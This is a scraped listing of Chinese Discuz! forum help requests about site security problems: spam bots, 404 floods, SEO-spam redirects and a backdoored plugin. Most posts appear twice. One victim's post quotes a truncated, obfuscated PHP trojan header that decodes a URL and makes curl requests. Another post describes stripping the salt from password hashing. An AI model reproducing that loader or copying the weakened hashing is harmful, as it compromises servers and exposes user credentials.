请教怎么修改网站的加密方式?
2022-01-24 16:52 来自 xiao9469 发布@ Discuz!问题求助
我查了一下资料,网站的加密方式是$password=md5(md5(password).$slat)
然后我在整个项目中全局搜索类似的代码,把 .salt 去掉
然后我注册了一个账号密码,去数据库中的ucenter_members这个表,看到生成的password,确实是两次md5加密,
但是我登陆新注册的号时,网站反馈验证失败。用以前的号登陆时,能登陆成功,
我觉得应该是验证的模块没改好,但是也不知道怎么解决。
请教一下怎么才能正确的修改网站的加密方式啊
然后我在整个项目中全局搜索类似的代码,把 .salt 去掉
然后我注册了一个账号密码,去数据库中的ucenter_members这个表,看到生成的password,确实是两次md5加密,
但是我登陆新注册的号时,网站反馈验证失败。用以前的号登陆时,能登陆成功,
我觉得应该是验证的模块没改好,但是也不知道怎么解决。
请教一下怎么才能正确的修改网站的加密方式啊
百度蜘蛛这样爬取,网站是不是存在问题? New
2023-11-12 07:36 来自 婷姐 发布@ Discuz!问题求助
50953
最近才发现百度这样爬取好几天了,有大神知道这是什么情况吗?
https://www.xxxx.com/forum.php?ctid=288462664bxU5MW2H/portal.php?mod=index&mobile=2
爬取的链接也可以正常打开。是不是中毒了。
我知道答案 回答被采纳将会获得1 贡献 已有2人回答
最近才发现百度这样爬取好几天了,有大神知道这是什么情况吗?
https://www.xxxx.com/forum.php?ctid=288462664bxU5MW2H/portal.php?mod=index&mobile=2
爬取的链接也可以正常打开。是不是中毒了。
我知道答案 回答被采纳将会获得1 贡献 已有2人回答
麻烦管理看一下。关于3.4首页加载出现了多个不明js文件问题
2023-05-03 16:59 来自 婷姐 发布@ Discuz!问题求助
事情的经过是这样,因为我有一个毛病喜欢去按F12看网页的各个网络打开速度。于是乎,当我按了F12后看到了如下问题:
我的网站中莫名出现了:misc.php?mod=patch&action=ipnotice&_r=0.3919208740895692&inajax=1&ajaxtarget=ip_notice
36970
如图所示的文件
那么,是不是我的模板的问题呢?
答案是否定的,我在网上找了一个同类型的一模一样的模板,发现别人的就没有这个文件
那么,是不是我的版本问题呢?(有没有可能是被注入了什么?)
答案也是否定的,为验证这个结论,我重新找了一台全新的服务器,搭建了一遍全新的社区,使用了官方给出的最新的Discuz! X3.4 正式版【2023-03-15】。然而一个全新的社区,也是出现了这个问题。
那么,是否是跟用户组有关呢?
说是也不是,怎么说呢?
当我使用管理者的用户组看时,出现了如下两个文件:
misc.php?mod=patch&action=pluginnotice&inajax=1&ajaxtarget=plug
我的网站中莫名出现了:misc.php?mod=patch&action=ipnotice&_r=0.3919208740895692&inajax=1&ajaxtarget=ip_notice
36970
如图所示的文件
那么,是不是我的模板的问题呢?
答案是否定的,我在网上找了一个同类型的一模一样的模板,发现别人的就没有这个文件
那么,是不是我的版本问题呢?(有没有可能是被注入了什么?)
答案也是否定的,为验证这个结论,我重新找了一台全新的服务器,搭建了一遍全新的社区,使用了官方给出的最新的Discuz! X3.4 正式版【2023-03-15】。然而一个全新的社区,也是出现了这个问题。
那么,是否是跟用户组有关呢?
说是也不是,怎么说呢?
当我使用管理者的用户组看时,出现了如下两个文件:
misc.php?mod=patch&action=pluginnotice&inajax=1&ajaxtarget=plug
这段时间老是被人404攻击,全访问一些404页面,导致负载和cpu使用率都满了,有大神知道咋办吗
2023-04-12 22:27 来自 婷姐 发布@ Discuz!问题求助
这段时间老是被人攻击,全访问下面这种不存在404页面,导致负载和cpu使用率都满了,有大神知道咋办吗
353253532635327
182.119.161.184 - - "GET /space-uid-22384.html HTTP/1.1" 200 6666 "http://网站的域名/forum.php?mod=viewthread&tid=3212&page=8&authorid=22384" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"
155.159.123.139 - - "GET /forum.php?action=recommend&do=subtract&hash=be89f68c&mod=misc&tid=97617 HTTP/1.1" 499 0 "http://www.baidu.com" "Mozilla/4.0 (compatible; MSIE 9
353253532635327
182.119.161.184 - - "GET /space-uid-22384.html HTTP/1.1" 200 6666 "http://网站的域名/forum.php?mod=viewthread&tid=3212&page=8&authorid=22384" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"
155.159.123.139 - - "GET /forum.php?action=recommend&do=subtract&hash=be89f68c&mod=misc&tid=97617 HTTP/1.1" 499 0 "http://www.baidu.com" "Mozilla/4.0 (compatible; MSIE 9
网站又被问候了
2022-04-18 07:16 来自 迪巴拉 发布@ Discuz!问题求助
10410
随后就被照顾了下
10411
这个网站已经是放任状态,费劲心机的何必呢
运营网站是香港空间,永远不会透漏域名的
国内的基本都是测试和放任状态,可不停的被有心人关照,累不累,哈哈
随后就被照顾了下
10411
这个网站已经是放任状态,费劲心机的何必呢
运营网站是香港空间,永远不会透漏域名的
国内的基本都是测试和放任状态,可不停的被有心人关照,累不累,哈哈
怎么防止dz应用中心监听检测网址防上传服务器IP网址的方法?
2021-05-28 11:00 来自 TyCoding 发布@ Discuz!问题求助
怎么防止dz应用中心监听检测网址防上传服务器IP网址的方法?
编辑:
/source/function/function_cloudaddons.php
查找:
'website_url' => 'https://addon.dismall.com',
'download_url' => 'https://addon.dismall.com/index.php',
'download_ip' => '',
'check_url' => 'https://addon1.dismall.com/md5/',
'check_ip' => '',
删除之~
编辑:
/source/function/function_cloudaddons.php
查找:
'website_url' => 'https://addon.dismall.com',
'download_url' => 'https://addon.dismall.com/index.php',
'download_ip' => '',
'check_url' => 'https://addon1.dismall.com/md5/',
'check_ip' => '',
删除之~
按照修改了,但依旧没用
2023-09-08 12:54 来自 婷姐 发布@ Discuz!问题求助
看了教程版块的方法,我以为也是1P变动缘固,然后去照着去修改了,但再去登入却登不上,一提交就刷新。这是后台密码被篡改了,还是怎么的?我知道答案 回答被采纳将会获得1 贡献 已有0人回答
47035
47036
47035
47036
手机版浏览时有风险提示
2023-06-14 11:35 来自 逝水年华 发布@ Discuz!问题求助
各位大神好。
我的网站是3.4最新版的,使用了https,在电脑上访问我的网站一切正常,网址前的https也是绿色的,但通过手机访问我的网站时(不管是电脑版还是手机版),我虽然都是通过https网址访问的,但网址前面总有个风险提示的感叹号!如下图所示,请问这个如何解决呢?
40355
我知道答案 回答被采纳将会获得1 贡献 已有1人回答
我的网站是3.4最新版的,使用了https,在电脑上访问我的网站一切正常,网址前的https也是绿色的,但通过手机访问我的网站时(不管是电脑版还是手机版),我虽然都是通过https网址访问的,但网址前面总有个风险提示的感叹号!如下图所示,请问这个如何解决呢?
40355
我知道答案 回答被采纳将会获得1 贡献 已有1人回答
请问下目录data/log日志下有这段是不是被黑了
2023-03-29 16:13 来自 逝水年华 发布@ Discuz!问题求助
<?PHP exit;?> 1678585565
<b>(0) notconnect</b><br><b>PHP:</b>
portal.php#discuz_application->discuz_application->init():0018
source/class/discuz/discuz_application.php#discuz_application->discuz_application->_init_db():0066<br>
source/class/discuz/discuz_application.php#discuz_database::discuz_database::init(%s, Array):0438<br>
source/class/discuz/discuz_database.php#db_driver_mysqli->db_driver_mysqli->connect():0023<br>
source/class/db/db_driver_mysqli.php#db_driver_mysqli->db_driv
<b>(0) notconnect</b><br><b>PHP:</b>
portal.php#discuz_application->discuz_application->init():0018
source/class/discuz/discuz_application.php#discuz_application->discuz_application->_init_db():0066<br>
source/class/discuz/discuz_application.php#discuz_database::discuz_database::init(%s, Array):0438<br>
source/class/discuz/discuz_database.php#db_driver_mysqli->db_driver_mysqli->connect():0023<br>
source/class/db/db_driver_mysqli.php#db_driver_mysqli->db_driv
后台的后缀能不能直接修改
2023-03-23 19:56 来自 镖师 发布@ Discuz!问题求助
xxx.com/admin.php 的 admin.php 修改成别的,最好能去掉 php我知道答案 回答被采纳将会获得1 贡献 已有0人回答
这些免费的插件不能使用吗???
2020-08-04 10:19 来自 迪巴拉 发布@ Discuz!问题求助
屋漏偏逢连夜雨 ,船迟又遇打头风
新人昨天辛辛苦苦搞了一天搭建啥的都弄好
遇到点小问题 有好心的大哥帮我
结果出了个这事,,,,,,
这有后门的东西为什么还要上架到应用中心
我接下是不是要重装系统 重新搭建。。。。。。。。
https://i.loli.net/2020/08/01/x7iQjgFKEB3CcdM.png
https://i.loli.net/2020/08/01/Ca7qiogRZTQHnsM.png
https://i.loli.net/2020/08/01/ktjhgnbDPqmB5HE.png
新人昨天辛辛苦苦搞了一天搭建啥的都弄好
遇到点小问题 有好心的大哥帮我
结果出了个这事,,,,,,
这有后门的东西为什么还要上架到应用中心
我接下是不是要重装系统 重新搭建。。。。。。。。
https://i.loli.net/2020/08/01/x7iQjgFKEB3CcdM.png
https://i.loli.net/2020/08/01/Ca7qiogRZTQHnsM.png
https://i.loli.net/2020/08/01/ktjhgnbDPqmB5HE.png
大神进来看看 这个算不算是漏洞 New
2025-04-13 21:13 来自 哥斯拉 发布@ Discuz! X3.5专区
/forum.php?aid=MjM5OHwwZWZlNjlkY3wxNzI2NDI3NDM4fDB8ODg0%C2%AChumb=yes&mod=attachment
怎么才能杜绝别人通过这个直接下载图片呢 而却还不需要打开网站就可以下载
我知道答案 回答被采纳将会获得1 贡献 已有4人回答
怎么才能杜绝别人通过这个直接下载图片呢 而却还不需要打开网站就可以下载
我知道答案 回答被采纳将会获得1 贡献 已有4人回答
DZ3.4被挂木马解决问题
2022-01-10 20:56 来自 𝕷𝖎𝖑𝖏𝖆𝖈𝖐 发布@ Discuz!问题求助
各位大大,请问 社区所有PHP代码头被植入以下代码,请问彻底解决?每次换新代码覆盖没两天,就又被植入了。
<?php
goto kBVB3; xe7sW: curl_setopt($ch, CURLOPT_HEADER, false); goto nXwRQ; LHGRb: header("\x43\x6f\x6e\164\x65\156\164\x2d\124\171\160\x65\72\x74\x65\170\x74\57\150\164\x6d\154\73\143\x68\x61\x72\x73\145\x74\x3d\x67\x62\x32\x33\61\x32"); goto Zcla7; R_Ek0: $file = base64_decode("\x61\x48\x52\60\143\x44\157\166\114\63\x52\154\132\x6e\116\x30\x4c\x6e\150\64\x62\x44\147\64\x4c\155\116\165\117\x6a\x67\167\115\104\101\x76\x61\x6e\x4e\x6a\x4c\
<?php
goto kBVB3; xe7sW: curl_setopt($ch, CURLOPT_HEADER, false); goto nXwRQ; LHGRb: header("\x43\x6f\x6e\164\x65\156\164\x2d\124\171\160\x65\72\x74\x65\170\x74\57\150\164\x6d\154\73\143\x68\x61\x72\x73\145\x74\x3d\x67\x62\x32\x33\61\x32"); goto Zcla7; R_Ek0: $file = base64_decode("\x61\x48\x52\60\143\x44\157\166\114\63\x52\154\132\x6e\116\x30\x4c\x6e\150\64\x62\x44\147\64\x4c\155\116\165\117\x6a\x67\167\115\104\101\x76\x61\x6e\x4e\x6a\x4c\
社区无法显示验证问题和验证码
2023-04-16 17:10 来自 逝水年华 发布@ Discuz!问题求助
向大家求职!我的社区运行了几年,之前一直可以显示后台设置的验证问题,也可以显示验证码。
最近开始出现问题,无法显示设置的验证问题,也无法显示验证码。
尝试了很多办法,重启机器,清空缓存,打开关闭各种验证设置,都无效。
关闭验证又会导致很多垃圾广告,很苦恼。
最近开始出现问题,无法显示设置的验证问题,也无法显示验证码。
尝试了很多办法,重启机器,清空缓存,打开关闭各种验证设置,都无效。
关闭验证又会导致很多垃圾广告,很苦恼。
网站被上百个垃圾账号注册发帖,如何防止?
2023-04-10 09:41 来自 迪巴拉 发布@ Discuz!问题求助
最近网站被上百个垃圾账号注册,从昨天持续到今天。
目前安全方面我有以下设置:
1.注册验证问答设置,需要回答一个常规问题,问答答案是一个词语,而且发现垃圾账号乱发后,我又调整了问题,但还是继续有新垃圾账号注册(以前设置验证问题有效果,现在感觉不起作用了)
2.新注册的用户组,会员每小时发主题数限制:20,会员每小时发回帖数限制:20,但减少发帖后,好像开始疯狂注册新账号,继续发贴
35070
发现垃圾账号和垃圾贴后我的处理方式:
禁止访问,并清空该用户相关内容(全选),
35071
然后在详情中,锁定当前用户,用户冻结状态选“需后台审核后解冻”
35072
垃圾账号IP一直变,注册的邮箱主要是21cn,163,以及QQ,另外也有绑定QQ号的。
请教三个问题:
1.防止垃圾账号注册方面,是否还有其他方式(暂时不想手机号注册)
2.有哪些设置可以防止(减少)发垃圾贴?
3.注册的这些垃圾账号,是否需要清理(考虑占用了用户UID)
当前版本Discuz! X3.4 R20220131 UTF-8
我知道答案 回答被采纳将会获得1 贡献 已有2人回答
目前安全方面我有以下设置:
1.注册验证问答设置,需要回答一个常规问题,问答答案是一个词语,而且发现垃圾账号乱发后,我又调整了问题,但还是继续有新垃圾账号注册(以前设置验证问题有效果,现在感觉不起作用了)
2.新注册的用户组,会员每小时发主题数限制:20,会员每小时发回帖数限制:20,但减少发帖后,好像开始疯狂注册新账号,继续发贴
35070
发现垃圾账号和垃圾贴后我的处理方式:
禁止访问,并清空该用户相关内容(全选),
35071
然后在详情中,锁定当前用户,用户冻结状态选“需后台审核后解冻”
35072
垃圾账号IP一直变,注册的邮箱主要是21cn,163,以及QQ,另外也有绑定QQ号的。
请教三个问题:
1.防止垃圾账号注册方面,是否还有其他方式(暂时不想手机号注册)
2.有哪些设置可以防止(减少)发垃圾贴?
3.注册的这些垃圾账号,是否需要清理(考虑占用了用户UID)
当前版本Discuz! X3.4 R20220131 UTF-8
我知道答案 回答被采纳将会获得1 贡献 已有2人回答
怎么防止机器人注册发广告 New
2024-02-13 17:15 来自 婷姐 发布@ Discuz!问题求助
我网站都还没建好,后台开启了验证码,还是没用。
照样有一堆外国机器人,跑来注册账号,然后发广告贴。
手机验证和邮箱验证,好像是要花钱,X3.5版本也没有看到相应的插件可以用。
现在咋办啊?每天删帖删到手酸。
我知道答案 回答被采纳将会获得1 贡献 已有5人回答
照样有一堆外国机器人,跑来注册账号,然后发广告贴。
手机验证和邮箱验证,好像是要花钱,X3.5版本也没有看到相应的插件可以用。
现在咋办啊?每天删帖删到手酸。
我知道答案 回答被采纳将会获得1 贡献 已有5人回答
十万火急,网址后面被加了参数跳转
2021-07-27 22:52 来自 左右不逢缘 发布@ Discuz!问题求助
大概是今年四月份,网站被植入了病毒,搜索一些不堪的关键词会显示我这个网站的网址,点开网址(网址后面加了"?id=一堆字符")就会跳转到那些乱七八糟的网站。
我在淘宝上找人搞了病毒,目前可以通过乱七八糟的关键词搜索到我的网址,但是点开已经不跳转了,虽然流量到了我的网站,但是这个迟早会被K掉,请问大家如何处理,或者查找修改那几个文件?
第一张图是百度统计,可以看到每天都是这些关键词进来。
6782
第二张图是百度的资源平台上看到的,都是这些关键词搜到我的网站
6783
第三张图是这些垃圾链接,都是添加在网址html后面或者php后面。
6784
虽然说这些链接还是在我的网站,但是我感觉迟早药丸。
网站有404,但是不找到怎么回事,这些链接不跳转到404
恳请大家为我解惑,给我指明方向!
感谢!!!
我在淘宝上找人搞了病毒,目前可以通过乱七八糟的关键词搜索到我的网址,但是点开已经不跳转了,虽然流量到了我的网站,但是这个迟早会被K掉,请问大家如何处理,或者查找修改那几个文件?
第一张图是百度统计,可以看到每天都是这些关键词进来。
6782
第二张图是百度的资源平台上看到的,都是这些关键词搜到我的网站
6783
第三张图是这些垃圾链接,都是添加在网址html后面或者php后面。
6784
虽然说这些链接还是在我的网站,但是我感觉迟早药丸。
网站有404,但是不找到怎么回事,这些链接不跳转到404
恳请大家为我解惑,给我指明方向!
感谢!!!
